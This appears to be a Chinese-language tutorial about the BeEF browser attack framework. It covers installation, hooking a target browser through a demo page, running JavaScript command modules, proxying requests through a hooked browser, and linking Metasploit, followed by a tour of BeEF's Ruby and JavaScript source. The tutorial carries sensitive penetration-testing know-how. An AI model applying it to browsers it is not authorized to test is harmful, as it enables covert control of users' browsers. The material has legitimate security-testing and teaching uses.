浅谈基于浏览器的攻击框架BeEF

安全 数据安全
BeEF是浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具

一、BeEF简介

BeEF是浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具。可在其官网找到更详细的介绍http://beefproject.com/。

二、安装BeEF

先下载Beef最新版本

$ svn checkout http://beef.googlecode.com/svn/track/ beef

$ ruby install

选择第一项自动安装需要的相关gems即可,也可以选择2按照提示一个一个进行安装,安装完成后就可以直接启动了

$ ruby beef -x

三、使用说明

3.1 启动BeEF

安装完成后,启动BeEF

#./beef 

 

命令行中显示的UI URL以后即为WEB接口,用浏览器打开,输入默认密码beef/beef,即可进入BeEF管理页面

按照提示,假设此时目标192.168.11.1的服务器访问了这个demo页面

http://192.168.11.152:3000/demos/basic.html。则就被hook上了,如下图所示 

 

3.2 实施攻击

HOOK持续的时间为关闭测试页面为止。在此期间,相当于被控制了,可以发送攻击命令了。选择commands栏,可以看到很多已经分好类的攻击模块。

其中,4种颜色分别表示:

该攻击模块可用,且隐蔽性强

该攻击模块可用,但隐蔽性查

该用户模块是否可用还有待验证

该攻击模块不可用 

 

例如,选取MISC下的Raw JavaScript模块作为测试用例,右端表格有该模块的详细说明,以及一些可选的参数等。输入Javascript code,点击Excute进行攻击,效果如下图所示 

 

3.3 Proxy功能

选中目标主机,点右键,在菜单中选中Use as Proxy 

 

然后再Rider选项卡中的Forge Request 编辑并发送想要发送的内容 

 

通过查看目标浏览器firebug记录,可以确信确实发送了该http,达到了代理效果。同时Rider下的History选项也记录了发送历史记录 

#p#

四、Metasploit组合

由于BeEF默认是不加载metasploit的,要使用Metasploit丰富的攻击模块,需要做些配置。BT5下,首先到beef目录下修改/pentest/web/beef/config.yaml文件,将其中的metasploit选项改为enable,如下所示:

 

 

然后查看/pentest/web/beef/extensions/metasploit/config.yaml。查看到其中的pass默认为abc123,这是与metasploit通信约定的密码。转到msf目录 /opt/metasploit/msf3/。新建一个 beef.rc文件,内容为

load msgrpc ServerHost=127.0.0.1 Pass=abc123

从而实现与beef的通信。启动msfconsole,

#msfconsole –r beef.rc,如下图所示,顺利启动服务。

 

 

现在可以启动beef了,启动后,可以看到BEEF加载了204个metasploit的攻击模块

 

 

页面如图,现在可以使用metasploit的模块进行攻击了。

 

#p#

五、实现原理

5.1 简述

BEEF 采用ruby语言编写,其目录结构如下所示:

 

 

除去一些安装和说明文件,Beef最主要的目录有三个,core、extension和modules。BEEF的核心文件在core目录下,各种扩展功能在extension目录下,modules则为攻击模块目录。

5.2 Core

Core目录是BEEF的核心目录,并负责加载extension和module。其中最关键的文件位于core\main目录下,其文件结构如下所示:

 

 

Client目录下均为js文件,是在受控客户端(hooked browser)使用的js文件,包括net、browser、encode、os等的实现,以update.js为例,在core\main\client\update.js中可以看到,定义了beef.updater,设置每隔5秒check一次是否有新的命令,如果有,则获取并执行之。

Console目录用于命令行控制

Constants目录定义了各种常量

Handlers目录主要用于处理来自受控客户端连接请求。

Models 定义了一些基本的类

Rest目录:即WEB服务基于REST原则,是一种轻量级的HTTP实现。 在server.rb中可看到,是通过mount的形式将资源与URL相对应,即它不是一个简单的WEB目录服务,任何需要http服务的资源,都需要先mount才能使用。

def mount(url, http_handler_class, args = nil)

# argument type checking

raise Exception::TypeError, ‘”url” needs to be a string’ if not url.string?

if args == nil

mounts[url] = http_handler_class

else

mounts[url] = http_handler_class, *args

end

print_debug(“Server: mounted handler ‘#{url}’”)

end

………

self.mount(“/init”, BeEF::Core::Handlers::BrowserDetails)

………

# Rack mount points

@rack_app = Rack::URLMap.new(@mounts)

………

# Create the BeEF http server

@http_server = Thin::Server.new(

@configuration.get(‘beef.http.host’),

@configuration.get(‘beef.http.port’),

@rack_app)

5.3 extensions

Extention目录下为各种扩展应用

 

 

其中几个extension的作用如下:

Admin_ui: 实现了一个WEB界面的控制后台。

Metasploit: 与metasploit互通相关的设置。

Requester: 负责处理HTTP请求,其文件如下所示:

 

 

其中:

Extension.rb 是每个扩展必有的文件,是加载该扩展的接口文件。

Config.yaml为作者和该扩展相关信息。

Api.rb为自身注册的一些API函数。

Models定义了一个http模型对象,例如,其中有个has_run属性,当请求未发送时,其值为”waiting”,发送攻击时,遍历状态为”waiting”的模块,并发送http请求。

Handler.rb 主要是处理http响应,收到响应后将相应的模块has_run状态置为complete,并保存到数据库。

5.4 modules

Modules集合了BEEF的各个攻击模块,一般一个攻击模块分为3个文件:command.js、config.yaml、module.rb。这样的结构可以很方便地进行模块添加,易于扩展。

Config.yaml: 攻击模块相关信息,如名称、描述、分类、作者、适用场景等

Module.rb:文件定义了该攻击模块的类,继承了BEFF::Core::Command类,在通用command类的基础上定义一些该模块特有的处理函数,如使用较多的一个函数是post_execute,即攻击进行后进行的操作(一般为保存结果),如下所示。

class Browser_fingerprinting < BeEF::Core::Command

def post_execute

content = {}

content['browser_type'] = @datastore['browser_type'] if not @datastore['browser_type'].nil?

content['browser_version'] = @datastore['browser_version'] if not @datastore['browser_version'].nil?

if content.empty?

content['fail'] = ‘Failed to fingerprint browser.’

end

save content

end

end

Command.js: 即为攻击代码,攻击时读取此js并发送给受控客户端。以detect_firebug模块的command.js为例,代码如下所示:

beef.execute(function() {

var result = “Not in use or not installed”;

if (window.console && (window.console.firebug || window.console.exception)) result = “Enabled and in use!”;

beef.net.send(“”, , “firebug=”+result);

});

代码很简单,在受控客户端执行取得结果之后,将结果返回给server端。Beef.net在core/main/client目录下定义。

在 Core目录下的Command.rb中,可以看到加载过程,首先判断该攻击模块的command.js是否存在,如存在,就读取到@eruby,可能还需要进行参数替换,所以需要进行evaluate操作。

def output

f = @path+’command.js’

(print_error “#{f} file does not exist”;return) if not File.exists? f

command = BeEF::Core::Models::Command.first(:id => @command_id)

@eruby = Erubis::FastEruby.new(File.read(f))

data = BeEF::Core::Configuration.instance.get(“beef.module.#{@key}”)

cc = BeEF::Core::CommandContext.new

cc['command_url'] = @default_command_url

cc['command_id'] = @command_id

JSON.parse(command['data']).each{|v|

cc[v['name']] = v['value']

}

if self.respond_to?(:execute)

self.execute

end

@output = @eruby.evaluate(cc)

@output

end

责任编辑:蓝雨泪 来源: 博客
相关推荐

2019-07-16 07:15:42

浏览器网络威胁网络安全

2017-04-26 14:15:35

浏览器缓存机制

2017-05-15 13:40:20

浏览器http缓存机制

2020-08-16 08:51:22

WEB安全网络攻击网络欺骗

2011-06-10 16:44:17

Qt 浏览器

2009-06-22 14:06:00

java浏览器

2017-05-02 09:25:13

浏览器指纹追踪虚拟化

2013-11-22 15:05:13

DDoSDDoS攻击

2022-06-04 07:13:20

黑客浏览器网络攻击

2024-01-29 12:12:19

2011-04-06 11:30:49

2015-05-06 10:02:26

2011-08-29 14:27:33

QTWebkit浏览器

2021-06-30 10:21:29

浏览器

2010-04-05 21:57:14

Netscape浏览器

2012-04-16 10:04:08

Eclipse浏览器IDE

2012-04-11 10:16:02

EclipseIDE

2009-04-03 09:09:21

浏览器网络办公室

2015-05-29 11:37:53

2021-12-06 16:33:05

浏览器攻击漏洞
点赞
收藏

51CTO技术栈公众号